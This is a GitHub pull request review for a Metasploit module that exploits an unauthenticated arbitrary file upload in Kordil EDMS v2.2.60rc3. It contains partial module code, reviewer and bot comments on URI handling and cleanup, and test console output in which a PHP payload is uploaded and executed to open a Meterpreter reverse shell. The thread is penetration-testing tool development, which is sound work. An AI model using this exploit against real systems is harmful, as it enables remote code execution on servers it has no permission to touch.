Add Kordil EDMS File Upload Vulnerability exploit #1512

Merged
merged 1 commit into from Feb 25, 2013


4 participants

@bcoles
Contributor
bcoles commented Feb 22, 2013

Add Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability exploit module.

@brandonprry brandonprry commented on the diff Feb 22, 2013
modules/exploits/multi/http/kordil-edms-upload-exec.rb
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",
+ 'Description' => %q{
+ This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.
+ This application has an upload feature that allows an unauthenticated user
+ to upload arbitrary files to the '/kordil_edms/userpictures/' directory.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
+ ],
+ 'References' =>
+ [
+ #['OSVDB', ''],
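Review bot: the 'References' array at the end of this hunk contains only the commented-out placeholder `#['OSVDB', '']`, so the module will load with an empty reference list; either fill in a real entry once one exists (the OSVDB id that is being requested in this thread, or a URL to an advisory) or drop the commented line so it does not look like a forgotten TODO. The 'Description' is otherwise clear, but it would help readers to say that the uploaded file is subsequently requested to execute it, since that is the part that generates the noisy second request.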
@brandonprry
brandonprry Feb 22, 2013 Contributor

No references?

@bcoles
bcoles Feb 22, 2013 Contributor

This software hasn't been updated since 2010.

Woody Hughes from Ingress Security discovered and reported multiple blind SQL injection vulnerabilities in Kordil EDMS in December 2012:

These issues haven't been patched.

To the best of my knowledge this file upload vulnerability (one of at least 5 in Kordil EDMS) has not been reported previously.

@brandonprry
brandonprry Feb 22, 2013 Contributor

You can hit up moderators@osvdb.org and get an OSVDB entry at least.

@bcoles
bcoles Feb 23, 2013 Contributor

Reported

@brandonprry
brandonprry Feb 23, 2013 Contributor

Cool, I think this will be ready to merge when we get the OSVDB number. Will just need another pair of eyes to look over it for consistency. (like @jvazquez-r7)

@wchen-r7
wchen-r7 Feb 25, 2013 Contributor

Still no reference, I'll just go ahead and publish anyway, but will keep an eye out for this. Or let us know if you have a reference we can use.

@brandonprry
Contributor

I am not actually able to repro this:

bperry@w00den-pickle:~/Projects/brandonprry_msf$ ./msfconsole --quiet
msf > use exploit/multi/http/kordil-edms-upload-exec
msf exploit(kordil-edms-upload-exec) > set RHOST 192.168.1.62
RHOST => 192.168.1.62
msf exploit(kordil-edms-upload-exec) > check
[+] The target is vulnerable.
msf exploit(kordil-edms-upload-exec) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] 192.168.1.62:80 - Uploading PHP payload (1315 bytes)
[-] Exploit failed [unexpected-reply]: 192.168.1.62:80 - Uploading PHP payload failed
[*] Exploit completed, but no session was created.

Thoughts?

@brandonprry
Contributor

Bah, didn't have perms right.

msf exploit(kordil-edms-upload-exec) > exploit

[*] Started reverse handler on 192.168.1.31:4444
[*] 192.168.1.62:80 - Uploading PHP payload (1315 bytes)
[+] 192.168.1.62:80 - File uploaded successfully
[*] 192.168.1.62:80 - Executing payload (userpictures/3626128.php)
[*] Sending stage (39217 bytes) to 192.168.1.62
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.62:35437) at Fri Feb 22 13:46:04 -0600 2013
id

meterpreter >

@todb-r7 todb-r7 commented on the diff Feb 25, 2013
modules/exploits/multi/http/kordil-edms-upload-exec.rb
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Feb 22 2013",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),
+ ], self.class)
+ end
+
+ def check
+
+ base = target_uri.path
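Review bot: `base = target_uri.path` at the end of this hunk uses the TARGETURI value verbatim, and the option's default '/kordil_edms/' already carries a trailing slash, so any URI built by concatenating onto `base` can end up with doubled slashes when a user sets a different path; use `base = normalize_uri(target_uri.path)` as the other HTTP modules do. Minor style point: the blank line directly after `def check` can be removed.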
@todb-r7
todb-r7 Feb 25, 2013 Contributor

this should use normalize_uri to catch those pesky extra slashes.

base = normalize_uri(target_uri.path)

At least, most other http modules do this now.

@todb-r7 todb-r7 commented on the diff Feb 25, 2013
modules/exploits/multi/http/kordil-edms-upload-exec.rb
+ return res
+ end
+
+ def on_new_session(client)
+ if client.type == "meterpreter"
+ client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+ client.fs.file.rm("#{@fname}.php")
+ else
+ client.shell_command_token("rm #{@fname}.php")
+ end
+ end
+
+
+ def exploit
+
+ base = target_uri.path
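Review bot: the cleanup in `on_new_session` deletes `"#{@fname}.php"` by a bare relative name in both the meterpreter branch (`client.fs.file.rm`) and the shell branch (`shell_command_token("rm ...")`), so it only succeeds if the session's working directory happens to be the upload directory; the test output in this thread shows the payload running as userpictures/<name>.php, so the safer approach is to keep the full path of the uploaded file alongside @fname and remove that, and to log whether the removal actually happened rather than discarding the result. The same `normalize_uri` change requested for `check` applies to `base = target_uri.path` here, `if not ... include?` reads more idiomatically as `unless`, and the double blank line before `def exploit` is a style nit.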
@todb-r7
todb-r7 Feb 25, 2013 Contributor

same here. normalize_uri.

FWIW, target_uri.path should do this for you, it's silly to have to type it.

@wchen-r7
Contributor

Tested:

msf  exploit(kordil-edms-upload-exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.83:4444 
[*] 192.168.1.72:80 - Uploading PHP payload (1315 bytes)
[+] 192.168.1.72:80 - File uploaded successfully
[*] 192.168.1.72:80 - Executing payload (userpictures/2364926.php)
[*] Sending stage (39217 bytes) to 192.168.1.72
[*] Meterpreter session 1 opened (192.168.1.83:4444 -> 192.168.1.72:45529) at 2013-02-25 12:57:46 -0600
@wchen-r7 wchen-r7 merged commit 0026543 into rapid7:master Feb 25, 2013

1 check passed

default The Travis build passed